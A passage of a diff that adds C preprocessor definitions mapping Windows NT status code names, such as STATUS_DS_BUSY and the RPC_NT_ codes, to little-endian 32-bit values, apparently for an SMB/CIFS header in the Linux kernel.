++#define STATUS_PWD_HISTORY_CONFLICT cpu_to_le32(0xC000025C)
++#define STATUS_PLUGPLAY_NO_DEVICE cpu_to_le32(0xC000025E)
++#define STATUS_UNSUPPORTED_COMPRESSION cpu_to_le32(0xC000025F)
++#define STATUS_INVALID_HW_PROFILE cpu_to_le32(0xC0000260)
++#define STATUS_INVALID_PLUGPLAY_DEVICE_PATH cpu_to_le32(0xC0000261)
++#define STATUS_DRIVER_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000262)
++#define STATUS_DRIVER_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000263)
++#define STATUS_RESOURCE_NOT_OWNED cpu_to_le32(0xC0000264)
++#define STATUS_TOO_MANY_LINKS cpu_to_le32(0xC0000265)
++#define STATUS_QUOTA_LIST_INCONSISTENT cpu_to_le32(0xC0000266)
++#define STATUS_FILE_IS_OFFLINE cpu_to_le32(0xC0000267)
++#define STATUS_EVALUATION_EXPIRATION cpu_to_le32(0xC0000268)
++#define STATUS_ILLEGAL_DLL_RELOCATION cpu_to_le32(0xC0000269)
++#define STATUS_LICENSE_VIOLATION cpu_to_le32(0xC000026A)
++#define STATUS_DLL_INIT_FAILED_LOGOFF cpu_to_le32(0xC000026B)
++#define STATUS_DRIVER_UNABLE_TO_LOAD cpu_to_le32(0xC000026C)
++#define STATUS_DFS_UNAVAILABLE cpu_to_le32(0xC000026D)
++#define STATUS_VOLUME_DISMOUNTED cpu_to_le32(0xC000026E)
++#define STATUS_WX86_INTERNAL_ERROR cpu_to_le32(0xC000026F)
++#define STATUS_WX86_FLOAT_STACK_CHECK cpu_to_le32(0xC0000270)
++#define STATUS_VALIDATE_CONTINUE cpu_to_le32(0xC0000271)
++#define STATUS_NO_MATCH cpu_to_le32(0xC0000272)
++#define STATUS_NO_MORE_MATCHES cpu_to_le32(0xC0000273)
++#define STATUS_NOT_A_REPARSE_POINT cpu_to_le32(0xC0000275)
++#define STATUS_IO_REPARSE_TAG_INVALID cpu_to_le32(0xC0000276)
++#define STATUS_IO_REPARSE_TAG_MISMATCH cpu_to_le32(0xC0000277)
++#define STATUS_IO_REPARSE_DATA_INVALID cpu_to_le32(0xC0000278)
++#define STATUS_IO_REPARSE_TAG_NOT_HANDLED cpu_to_le32(0xC0000279)
++#define STATUS_REPARSE_POINT_NOT_RESOLVED cpu_to_le32(0xC0000280)
++#define STATUS_DIRECTORY_IS_A_REPARSE_POINT cpu_to_le32(0xC0000281)
++#define STATUS_RANGE_LIST_CONFLICT cpu_to_le32(0xC0000282)
++#define STATUS_SOURCE_ELEMENT_EMPTY cpu_to_le32(0xC0000283)
++#define STATUS_DESTINATION_ELEMENT_FULL cpu_to_le32(0xC0000284)
++#define STATUS_ILLEGAL_ELEMENT_ADDRESS cpu_to_le32(0xC0000285)
++#define STATUS_MAGAZINE_NOT_PRESENT cpu_to_le32(0xC0000286)
++#define STATUS_REINITIALIZATION_NEEDED cpu_to_le32(0xC0000287)
++#define STATUS_ENCRYPTION_FAILED cpu_to_le32(0xC000028A)
++#define STATUS_DECRYPTION_FAILED cpu_to_le32(0xC000028B)
++#define STATUS_RANGE_NOT_FOUND cpu_to_le32(0xC000028C)
++#define STATUS_NO_RECOVERY_POLICY cpu_to_le32(0xC000028D)
++#define STATUS_NO_EFS cpu_to_le32(0xC000028E)
++#define STATUS_WRONG_EFS cpu_to_le32(0xC000028F)
++#define STATUS_NO_USER_KEYS cpu_to_le32(0xC0000290)
++#define STATUS_FILE_NOT_ENCRYPTED cpu_to_le32(0xC0000291)
++#define STATUS_NOT_EXPORT_FORMAT cpu_to_le32(0xC0000292)
++#define STATUS_FILE_ENCRYPTED cpu_to_le32(0xC0000293)
++#define STATUS_WMI_GUID_NOT_FOUND cpu_to_le32(0xC0000295)
++#define STATUS_WMI_INSTANCE_NOT_FOUND cpu_to_le32(0xC0000296)
++#define STATUS_WMI_ITEMID_NOT_FOUND cpu_to_le32(0xC0000297)
++#define STATUS_WMI_TRY_AGAIN cpu_to_le32(0xC0000298)
++#define STATUS_SHARED_POLICY cpu_to_le32(0xC0000299)
++#define STATUS_POLICY_OBJECT_NOT_FOUND cpu_to_le32(0xC000029A)
++#define STATUS_POLICY_ONLY_IN_DS cpu_to_le32(0xC000029B)
++#define STATUS_VOLUME_NOT_UPGRADED cpu_to_le32(0xC000029C)
++#define STATUS_REMOTE_STORAGE_NOT_ACTIVE cpu_to_le32(0xC000029D)
++#define STATUS_REMOTE_STORAGE_MEDIA_ERROR cpu_to_le32(0xC000029E)
++#define STATUS_NO_TRACKING_SERVICE cpu_to_le32(0xC000029F)
++#define STATUS_SERVER_SID_MISMATCH cpu_to_le32(0xC00002A0)
++#define STATUS_DS_NO_ATTRIBUTE_OR_VALUE cpu_to_le32(0xC00002A1)
++#define STATUS_DS_INVALID_ATTRIBUTE_SYNTAX cpu_to_le32(0xC00002A2)
++#define STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED cpu_to_le32(0xC00002A3)
++#define STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS cpu_to_le32(0xC00002A4)
++#define STATUS_DS_BUSY cpu_to_le32(0xC00002A5)
++#define STATUS_DS_UNAVAILABLE cpu_to_le32(0xC00002A6)
++#define STATUS_DS_NO_RIDS_ALLOCATED cpu_to_le32(0xC00002A7)
++#define STATUS_DS_NO_MORE_RIDS cpu_to_le32(0xC00002A8)
++#define STATUS_DS_INCORRECT_ROLE_OWNER cpu_to_le32(0xC00002A9)
++#define STATUS_DS_RIDMGR_INIT_ERROR cpu_to_le32(0xC00002AA)
++#define STATUS_DS_OBJ_CLASS_VIOLATION cpu_to_le32(0xC00002AB)
++#define STATUS_DS_CANT_ON_NON_LEAF cpu_to_le32(0xC00002AC)
++#define STATUS_DS_CANT_ON_RDN cpu_to_le32(0xC00002AD)
++#define STATUS_DS_CANT_MOD_OBJ_CLASS cpu_to_le32(0xC00002AE)
++#define STATUS_DS_CROSS_DOM_MOVE_FAILED cpu_to_le32(0xC00002AF)
++#define STATUS_DS_GC_NOT_AVAILABLE cpu_to_le32(0xC00002B0)
++#define STATUS_DIRECTORY_SERVICE_REQUIRED cpu_to_le32(0xC00002B1)
++#define STATUS_REPARSE_ATTRIBUTE_CONFLICT cpu_to_le32(0xC00002B2)
++#define STATUS_CANT_ENABLE_DENY_ONLY cpu_to_le32(0xC00002B3)
++#define STATUS_FLOAT_MULTIPLE_FAULTS cpu_to_le32(0xC00002B4)
++#define STATUS_FLOAT_MULTIPLE_TRAPS cpu_to_le32(0xC00002B5)
++#define STATUS_DEVICE_REMOVED cpu_to_le32(0xC00002B6)
++#define STATUS_JOURNAL_DELETE_IN_PROGRESS cpu_to_le32(0xC00002B7)
++#define STATUS_JOURNAL_NOT_ACTIVE cpu_to_le32(0xC00002B8)
++#define STATUS_NOINTERFACE cpu_to_le32(0xC00002B9)
++#define STATUS_DS_ADMIN_LIMIT_EXCEEDED cpu_to_le32(0xC00002C1)
++#define STATUS_DRIVER_FAILED_SLEEP cpu_to_le32(0xC00002C2)
++#define STATUS_MUTUAL_AUTHENTICATION_FAILED cpu_to_le32(0xC00002C3)
++#define STATUS_CORRUPT_SYSTEM_FILE cpu_to_le32(0xC00002C4)
++#define STATUS_DATATYPE_MISALIGNMENT_ERROR cpu_to_le32(0xC00002C5)
++#define STATUS_WMI_READ_ONLY cpu_to_le32(0xC00002C6)
++#define STATUS_WMI_SET_FAILURE cpu_to_le32(0xC00002C7)
++#define STATUS_COMMITMENT_MINIMUM cpu_to_le32(0xC00002C8)
++#define STATUS_REG_NAT_CONSUMPTION cpu_to_le32(0xC00002C9)
++#define STATUS_TRANSPORT_FULL cpu_to_le32(0xC00002CA)
++#define STATUS_DS_SAM_INIT_FAILURE cpu_to_le32(0xC00002CB)
++#define STATUS_ONLY_IF_CONNECTED cpu_to_le32(0xC00002CC)
++#define STATUS_DS_SENSITIVE_GROUP_VIOLATION cpu_to_le32(0xC00002CD)
++#define STATUS_PNP_RESTART_ENUMERATION cpu_to_le32(0xC00002CE)
++#define STATUS_JOURNAL_ENTRY_DELETED cpu_to_le32(0xC00002CF)
++#define STATUS_DS_CANT_MOD_PRIMARYGROUPID cpu_to_le32(0xC00002D0)
++#define STATUS_SYSTEM_IMAGE_BAD_SIGNATURE cpu_to_le32(0xC00002D1)
++#define STATUS_PNP_REBOOT_REQUIRED cpu_to_le32(0xC00002D2)
++#define STATUS_POWER_STATE_INVALID cpu_to_le32(0xC00002D3)
++#define STATUS_DS_INVALID_GROUP_TYPE cpu_to_le32(0xC00002D4)
++#define STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D5)
++#define STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN cpu_to_le32(0xC00002D6)
++#define STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D7)
++#define STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC00002D8)
++#define STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER cpu_to_le32(0xC00002D9)
++#define STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER cpu_to_le32(0xC00002DA)
++#define STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER cpu_to_le32(0xC00002DB)
++#define STATUS_DS_HAVE_PRIMARY_MEMBERS cpu_to_le32(0xC00002DC)
++#define STATUS_WMI_NOT_SUPPORTED cpu_to_le32(0xC00002DD)
++#define STATUS_INSUFFICIENT_POWER cpu_to_le32(0xC00002DE)
++#define STATUS_SAM_NEED_BOOTKEY_PASSWORD cpu_to_le32(0xC00002DF)
++#define STATUS_SAM_NEED_BOOTKEY_FLOPPY cpu_to_le32(0xC00002E0)
++#define STATUS_DS_CANT_START cpu_to_le32(0xC00002E1)
++#define STATUS_DS_INIT_FAILURE cpu_to_le32(0xC00002E2)
++#define STATUS_SAM_INIT_FAILURE cpu_to_le32(0xC00002E3)
++#define STATUS_DS_GC_REQUIRED cpu_to_le32(0xC00002E4)
++#define STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY cpu_to_le32(0xC00002E5)
++#define STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS cpu_to_le32(0xC00002E6)
++#define STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED cpu_to_le32(0xC00002E7)
++#define STATUS_MULTIPLE_FAULT_VIOLATION cpu_to_le32(0xC00002E8)
++#define STATUS_CURRENT_DOMAIN_NOT_ALLOWED cpu_to_le32(0xC00002E9)
++#define STATUS_CANNOT_MAKE cpu_to_le32(0xC00002EA)
++#define STATUS_SYSTEM_SHUTDOWN cpu_to_le32(0xC00002EB)
++#define STATUS_DS_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002EC)
++#define STATUS_DS_SAM_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002ED)
++#define STATUS_UNFINISHED_CONTEXT_DELETED cpu_to_le32(0xC00002EE)
++#define STATUS_NO_TGT_REPLY cpu_to_le32(0xC00002EF)
++#define STATUS_OBJECTID_NOT_FOUND cpu_to_le32(0xC00002F0)
++#define STATUS_NO_IP_ADDRESSES cpu_to_le32(0xC00002F1)
++#define STATUS_WRONG_CREDENTIAL_HANDLE cpu_to_le32(0xC00002F2)
++#define STATUS_CRYPTO_SYSTEM_INVALID cpu_to_le32(0xC00002F3)
++#define STATUS_MAX_REFERRALS_EXCEEDED cpu_to_le32(0xC00002F4)
++#define STATUS_MUST_BE_KDC cpu_to_le32(0xC00002F5)
++#define STATUS_STRONG_CRYPTO_NOT_SUPPORTED cpu_to_le32(0xC00002F6)
++#define STATUS_TOO_MANY_PRINCIPALS cpu_to_le32(0xC00002F7)
++#define STATUS_NO_PA_DATA cpu_to_le32(0xC00002F8)
++#define STATUS_PKINIT_NAME_MISMATCH cpu_to_le32(0xC00002F9)
++#define STATUS_SMARTCARD_LOGON_REQUIRED cpu_to_le32(0xC00002FA)
++#define STATUS_KDC_INVALID_REQUEST cpu_to_le32(0xC00002FB)
++#define STATUS_KDC_UNABLE_TO_REFER cpu_to_le32(0xC00002FC)
++#define STATUS_KDC_UNKNOWN_ETYPE cpu_to_le32(0xC00002FD)
++#define STATUS_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FE)
++#define STATUS_SERVER_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FF)
++#define STATUS_NOT_SUPPORTED_ON_SBS cpu_to_le32(0xC0000300)
++#define STATUS_WMI_GUID_DISCONNECTED cpu_to_le32(0xC0000301)
++#define STATUS_WMI_ALREADY_DISABLED cpu_to_le32(0xC0000302)
++#define STATUS_WMI_ALREADY_ENABLED cpu_to_le32(0xC0000303)
++#define STATUS_MFT_TOO_FRAGMENTED cpu_to_le32(0xC0000304)
++#define STATUS_COPY_PROTECTION_FAILURE cpu_to_le32(0xC0000305)
++#define STATUS_CSS_AUTHENTICATION_FAILURE cpu_to_le32(0xC0000306)
++#define STATUS_CSS_KEY_NOT_PRESENT cpu_to_le32(0xC0000307)
++#define STATUS_CSS_KEY_NOT_ESTABLISHED cpu_to_le32(0xC0000308)
++#define STATUS_CSS_SCRAMBLED_SECTOR cpu_to_le32(0xC0000309)
++#define STATUS_CSS_REGION_MISMATCH cpu_to_le32(0xC000030A)
++#define STATUS_CSS_RESETS_EXHAUSTED cpu_to_le32(0xC000030B)
++#define STATUS_PKINIT_FAILURE cpu_to_le32(0xC0000320)
++#define STATUS_SMARTCARD_SUBSYSTEM_FAILURE cpu_to_le32(0xC0000321)
++#define STATUS_NO_KERB_KEY cpu_to_le32(0xC0000322)
++#define STATUS_HOST_DOWN cpu_to_le32(0xC0000350)
++#define STATUS_UNSUPPORTED_PREAUTH cpu_to_le32(0xC0000351)
++#define STATUS_EFS_ALG_BLOB_TOO_BIG cpu_to_le32(0xC0000352)
++#define STATUS_PORT_NOT_SET cpu_to_le32(0xC0000353)
++#define STATUS_DEBUGGER_INACTIVE cpu_to_le32(0xC0000354)
++#define STATUS_DS_VERSION_CHECK_FAILURE cpu_to_le32(0xC0000355)
++#define STATUS_AUDITING_DISABLED cpu_to_le32(0xC0000356)
++#define STATUS_PRENT4_MACHINE_ACCOUNT cpu_to_le32(0xC0000357)
++#define STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC0000358)
++#define STATUS_INVALID_IMAGE_WIN_32 cpu_to_le32(0xC0000359)
++#define STATUS_INVALID_IMAGE_WIN_64 cpu_to_le32(0xC000035A)
++#define STATUS_BAD_BINDINGS cpu_to_le32(0xC000035B)
++#define STATUS_NETWORK_SESSION_EXPIRED cpu_to_le32(0xC000035C)
++#define STATUS_APPHELP_BLOCK cpu_to_le32(0xC000035D)
++#define STATUS_ALL_SIDS_FILTERED cpu_to_le32(0xC000035E)
++#define STATUS_NOT_SAFE_MODE_DRIVER cpu_to_le32(0xC000035F)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT cpu_to_le32(0xC0000361)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_PATH cpu_to_le32(0xC0000362)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER cpu_to_le32(0xC0000363)
++#define STATUS_ACCESS_DISABLED_BY_POLICY_OTHER cpu_to_le32(0xC0000364)
++#define STATUS_FAILED_DRIVER_ENTRY cpu_to_le32(0xC0000365)
++#define STATUS_DEVICE_ENUMERATION_ERROR cpu_to_le32(0xC0000366)
++#define STATUS_MOUNT_POINT_NOT_RESOLVED cpu_to_le32(0xC0000368)
++#define STATUS_INVALID_DEVICE_OBJECT_PARAMETER cpu_to_le32(0xC0000369)
++#define STATUS_MCA_OCCURED cpu_to_le32(0xC000036A)
++#define STATUS_DRIVER_BLOCKED_CRITICAL cpu_to_le32(0xC000036B)
++#define STATUS_DRIVER_BLOCKED cpu_to_le32(0xC000036C)
++#define STATUS_DRIVER_DATABASE_ERROR cpu_to_le32(0xC000036D)
++#define STATUS_SYSTEM_HIVE_TOO_LARGE cpu_to_le32(0xC000036E)
++#define STATUS_INVALID_IMPORT_OF_NON_DLL cpu_to_le32(0xC000036F)
++#define STATUS_NO_SECRETS cpu_to_le32(0xC0000371)
++#define STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY cpu_to_le32(0xC0000372)
++#define STATUS_FAILED_STACK_SWITCH cpu_to_le32(0xC0000373)
++#define STATUS_HEAP_CORRUPTION cpu_to_le32(0xC0000374)
++#define STATUS_SMARTCARD_WRONG_PIN cpu_to_le32(0xC0000380)
++#define STATUS_SMARTCARD_CARD_BLOCKED cpu_to_le32(0xC0000381)
++#define STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED cpu_to_le32(0xC0000382)
++#define STATUS_SMARTCARD_NO_CARD cpu_to_le32(0xC0000383)
++#define STATUS_SMARTCARD_NO_KEY_CONTAINER cpu_to_le32(0xC0000384)
++#define STATUS_SMARTCARD_NO_CERTIFICATE cpu_to_le32(0xC0000385)
++#define STATUS_SMARTCARD_NO_KEYSET cpu_to_le32(0xC0000386)
++#define STATUS_SMARTCARD_IO_ERROR cpu_to_le32(0xC0000387)
++#define STATUS_DOWNGRADE_DETECTED cpu_to_le32(0xC0000388)
++#define STATUS_SMARTCARD_CERT_REVOKED cpu_to_le32(0xC0000389)
++#define STATUS_ISSUING_CA_UNTRUSTED cpu_to_le32(0xC000038A)
++#define STATUS_REVOCATION_OFFLINE_C cpu_to_le32(0xC000038B)
++#define STATUS_PKINIT_CLIENT_FAILURE cpu_to_le32(0xC000038C)
++#define STATUS_SMARTCARD_CERT_EXPIRED cpu_to_le32(0xC000038D)
++#define STATUS_DRIVER_FAILED_PRIOR_UNLOAD cpu_to_le32(0xC000038E)
++#define STATUS_SMARTCARD_SILENT_CONTEXT cpu_to_le32(0xC000038F)
++#define STATUS_PER_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000401)
++#define STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000402)
++#define STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000403)
++#define STATUS_DS_NAME_NOT_UNIQUE cpu_to_le32(0xC0000404)
++#define STATUS_DS_DUPLICATE_ID_FOUND cpu_to_le32(0xC0000405)
++#define STATUS_DS_GROUP_CONVERSION_ERROR cpu_to_le32(0xC0000406)
++#define STATUS_VOLSNAP_PREPARE_HIBERNATE cpu_to_le32(0xC0000407)
++#define STATUS_USER2USER_REQUIRED cpu_to_le32(0xC0000408)
++#define STATUS_STACK_BUFFER_OVERRUN cpu_to_le32(0xC0000409)
++#define STATUS_NO_S4U_PROT_SUPPORT cpu_to_le32(0xC000040A)
++#define STATUS_CROSSREALM_DELEGATION_FAILURE cpu_to_le32(0xC000040B)
++#define STATUS_REVOCATION_OFFLINE_KDC cpu_to_le32(0xC000040C)
++#define STATUS_ISSUING_CA_UNTRUSTED_KDC cpu_to_le32(0xC000040D)
++#define STATUS_KDC_CERT_EXPIRED cpu_to_le32(0xC000040E)
++#define STATUS_KDC_CERT_REVOKED cpu_to_le32(0xC000040F)
++#define STATUS_PARAMETER_QUOTA_EXCEEDED cpu_to_le32(0xC0000410)
++#define STATUS_HIBERNATION_FAILURE cpu_to_le32(0xC0000411)
++#define STATUS_DELAY_LOAD_FAILED cpu_to_le32(0xC0000412)
++#define STATUS_AUTHENTICATION_FIREWALL_FAILED cpu_to_le32(0xC0000413)
++#define STATUS_VDM_DISALLOWED cpu_to_le32(0xC0000414)
++#define STATUS_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC0000415)
++#define STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE cpu_to_le32(0xC0000416)
++#define STATUS_INVALID_CRUNTIME_PARAMETER cpu_to_le32(0xC0000417)
++#define STATUS_NTLM_BLOCKED cpu_to_le32(0xC0000418)
++#define STATUS_ASSERTION_FAILURE cpu_to_le32(0xC0000420)
++#define STATUS_VERIFIER_STOP cpu_to_le32(0xC0000421)
++#define STATUS_CALLBACK_POP_STACK cpu_to_le32(0xC0000423)
++#define STATUS_INCOMPATIBLE_DRIVER_BLOCKED cpu_to_le32(0xC0000424)
++#define STATUS_HIVE_UNLOADED cpu_to_le32(0xC0000425)
++#define STATUS_COMPRESSION_DISABLED cpu_to_le32(0xC0000426)
++#define STATUS_FILE_SYSTEM_LIMITATION cpu_to_le32(0xC0000427)
++#define STATUS_INVALID_IMAGE_HASH cpu_to_le32(0xC0000428)
++#define STATUS_NOT_CAPABLE cpu_to_le32(0xC0000429)
++#define STATUS_REQUEST_OUT_OF_SEQUENCE cpu_to_le32(0xC000042A)
++#define STATUS_IMPLEMENTATION_LIMIT cpu_to_le32(0xC000042B)
++#define STATUS_ELEVATION_REQUIRED cpu_to_le32(0xC000042C)
++#define STATUS_BEYOND_VDL cpu_to_le32(0xC0000432)
++#define STATUS_ENCOUNTERED_WRITE_IN_PROGRESS cpu_to_le32(0xC0000433)
++#define STATUS_PTE_CHANGED cpu_to_le32(0xC0000434)
++#define STATUS_PURGE_FAILED cpu_to_le32(0xC0000435)
++#define STATUS_CRED_REQUIRES_CONFIRMATION cpu_to_le32(0xC0000440)
++#define STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE cpu_to_le32(0xC0000441)
++#define STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER cpu_to_le32(0xC0000442)
++#define STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE cpu_to_le32(0xC0000443)
++#define STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE cpu_to_le32(0xC0000444)
++#define STATUS_CS_ENCRYPTION_FILE_NOT_CSE cpu_to_le32(0xC0000445)
++#define STATUS_INVALID_LABEL cpu_to_le32(0xC0000446)
++#define STATUS_DRIVER_PROCESS_TERMINATED cpu_to_le32(0xC0000450)
++#define STATUS_AMBIGUOUS_SYSTEM_DEVICE cpu_to_le32(0xC0000451)
++#define STATUS_SYSTEM_DEVICE_NOT_FOUND cpu_to_le32(0xC0000452)
++#define STATUS_RESTART_BOOT_APPLICATION cpu_to_le32(0xC0000453)
++#define STATUS_INVALID_TASK_NAME cpu_to_le32(0xC0000500)
++#define STATUS_INVALID_TASK_INDEX cpu_to_le32(0xC0000501)
++#define STATUS_THREAD_ALREADY_IN_TASK cpu_to_le32(0xC0000502)
++#define STATUS_CALLBACK_BYPASS cpu_to_le32(0xC0000503)
++#define STATUS_PORT_CLOSED cpu_to_le32(0xC0000700)
++#define STATUS_MESSAGE_LOST cpu_to_le32(0xC0000701)
++#define STATUS_INVALID_MESSAGE cpu_to_le32(0xC0000702)
++#define STATUS_REQUEST_CANCELED cpu_to_le32(0xC0000703)
++#define STATUS_RECURSIVE_DISPATCH cpu_to_le32(0xC0000704)
++#define STATUS_LPC_RECEIVE_BUFFER_EXPECTED cpu_to_le32(0xC0000705)
++#define STATUS_LPC_INVALID_CONNECTION_USAGE cpu_to_le32(0xC0000706)
++#define STATUS_LPC_REQUESTS_NOT_ALLOWED cpu_to_le32(0xC0000707)
++#define STATUS_RESOURCE_IN_USE cpu_to_le32(0xC0000708)
++#define STATUS_HARDWARE_MEMORY_ERROR cpu_to_le32(0xC0000709)
++#define STATUS_THREADPOOL_HANDLE_EXCEPTION cpu_to_le32(0xC000070A)
++#define STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED cpu_to_le32(0xC000070B)
++#define STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED cpu_to_le32(0xC000070C)
++#define STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED cpu_to_le32(0xC000070D)
++#define STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED cpu_to_le32(0xC000070E)
++#define STATUS_THREADPOOL_RELEASED_DURING_OPERATION cpu_to_le32(0xC000070F)
++#define STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000710)
++#define STATUS_APC_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000711)
++#define STATUS_PROCESS_IS_PROTECTED cpu_to_le32(0xC0000712)
++#define STATUS_MCA_EXCEPTION cpu_to_le32(0xC0000713)
++#define STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE cpu_to_le32(0xC0000714)
++#define STATUS_SYMLINK_CLASS_DISABLED cpu_to_le32(0xC0000715)
++#define STATUS_INVALID_IDN_NORMALIZATION cpu_to_le32(0xC0000716)
++#define STATUS_NO_UNICODE_TRANSLATION cpu_to_le32(0xC0000717)
++#define STATUS_ALREADY_REGISTERED cpu_to_le32(0xC0000718)
++#define STATUS_CONTEXT_MISMATCH cpu_to_le32(0xC0000719)
++#define STATUS_PORT_ALREADY_HAS_COMPLETION_LIST cpu_to_le32(0xC000071A)
++#define STATUS_CALLBACK_RETURNED_THREAD_PRIORITY cpu_to_le32(0xC000071B)
++#define STATUS_INVALID_THREAD cpu_to_le32(0xC000071C)
++#define STATUS_CALLBACK_RETURNED_TRANSACTION cpu_to_le32(0xC000071D)
++#define STATUS_CALLBACK_RETURNED_LDR_LOCK cpu_to_le32(0xC000071E)
++#define STATUS_CALLBACK_RETURNED_LANG cpu_to_le32(0xC000071F)
++#define STATUS_CALLBACK_RETURNED_PRI_BACK cpu_to_le32(0xC0000720)
++#define STATUS_CALLBACK_RETURNED_THREAD_AFFINITY cpu_to_le32(0xC0000721)
++#define STATUS_DISK_REPAIR_DISABLED cpu_to_le32(0xC0000800)
++#define STATUS_DS_DOMAIN_RENAME_IN_PROGRESS cpu_to_le32(0xC0000801)
++#define STATUS_DISK_QUOTA_EXCEEDED cpu_to_le32(0xC0000802)
++#define STATUS_CONTENT_BLOCKED cpu_to_le32(0xC0000804)
++#define STATUS_BAD_CLUSTERS cpu_to_le32(0xC0000805)
++#define STATUS_VOLUME_DIRTY cpu_to_le32(0xC0000806)
++#define STATUS_FILE_CHECKED_OUT cpu_to_le32(0xC0000901)
++#define STATUS_CHECKOUT_REQUIRED cpu_to_le32(0xC0000902)
++#define STATUS_BAD_FILE_TYPE cpu_to_le32(0xC0000903)
++#define STATUS_FILE_TOO_LARGE cpu_to_le32(0xC0000904)
++#define STATUS_FORMS_AUTH_REQUIRED cpu_to_le32(0xC0000905)
++#define STATUS_VIRUS_INFECTED cpu_to_le32(0xC0000906)
++#define STATUS_VIRUS_DELETED cpu_to_le32(0xC0000907)
++#define STATUS_BAD_MCFG_TABLE cpu_to_le32(0xC0000908)
++#define STATUS_WOW_ASSERTION cpu_to_le32(0xC0009898)
++#define STATUS_INVALID_SIGNATURE cpu_to_le32(0xC000A000)
++#define STATUS_HMAC_NOT_SUPPORTED cpu_to_le32(0xC000A001)
++#define STATUS_IPSEC_QUEUE_OVERFLOW cpu_to_le32(0xC000A010)
++#define STATUS_ND_QUEUE_OVERFLOW cpu_to_le32(0xC000A011)
++#define STATUS_HOPLIMIT_EXCEEDED cpu_to_le32(0xC000A012)
++#define STATUS_PROTOCOL_NOT_SUPPORTED cpu_to_le32(0xC000A013)
++#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED cpu_to_le32(0xC000A080)
++#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR cpu_to_le32(0xC000A081)
++#define STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR cpu_to_le32(0xC000A082)
++#define STATUS_XML_PARSE_ERROR cpu_to_le32(0xC000A083)
++#define STATUS_XMLDSIG_ERROR cpu_to_le32(0xC000A084)
++#define STATUS_WRONG_COMPARTMENT cpu_to_le32(0xC000A085)
++#define STATUS_AUTHIP_FAILURE cpu_to_le32(0xC000A086)
++#define DBG_NO_STATE_CHANGE cpu_to_le32(0xC0010001)
++#define DBG_APP_NOT_IDLE cpu_to_le32(0xC0010002)
++#define RPC_NT_INVALID_STRING_BINDING cpu_to_le32(0xC0020001)
++#define RPC_NT_WRONG_KIND_OF_BINDING cpu_to_le32(0xC0020002)
++#define RPC_NT_INVALID_BINDING cpu_to_le32(0xC0020003)
++#define RPC_NT_PROTSEQ_NOT_SUPPORTED cpu_to_le32(0xC0020004)
++#define RPC_NT_INVALID_RPC_PROTSEQ cpu_to_le32(0xC0020005)
++#define RPC_NT_INVALID_STRING_UUID cpu_to_le32(0xC0020006)
++#define RPC_NT_INVALID_ENDPOINT_FORMAT cpu_to_le32(0xC0020007)
++#define RPC_NT_INVALID_NET_ADDR cpu_to_le32(0xC0020008)
++#define RPC_NT_NO_ENDPOINT_FOUND cpu_to_le32(0xC0020009)
++#define RPC_NT_INVALID_TIMEOUT cpu_to_le32(0xC002000A)
++#define RPC_NT_OBJECT_NOT_FOUND cpu_to_le32(0xC002000B)
++#define RPC_NT_ALREADY_REGISTERED cpu_to_le32(0xC002000C)
++#define RPC_NT_TYPE_ALREADY_REGISTERED cpu_to_le32(0xC002000D)
++#define RPC_NT_ALREADY_LISTENING cpu_to_le32(0xC002000E)
++#define RPC_NT_NO_PROTSEQS_REGISTERED cpu_to_le32(0xC002000F)
++#define RPC_NT_NOT_LISTENING cpu_to_le32(0xC0020010)
++#define RPC_NT_UNKNOWN_MGR_TYPE cpu_to_le32(0xC0020011)
++#define RPC_NT_UNKNOWN_IF cpu_to_le32(0xC0020012)
++#define RPC_NT_NO_BINDINGS cpu_to_le32(0xC0020013)
++#define RPC_NT_NO_PROTSEQS cpu_to_le32(0xC0020014)
++#define RPC_NT_CANT_CREATE_ENDPOINT cpu_to_le32(0xC0020015)
++#define RPC_NT_OUT_OF_RESOURCES cpu_to_le32(0xC0020016)
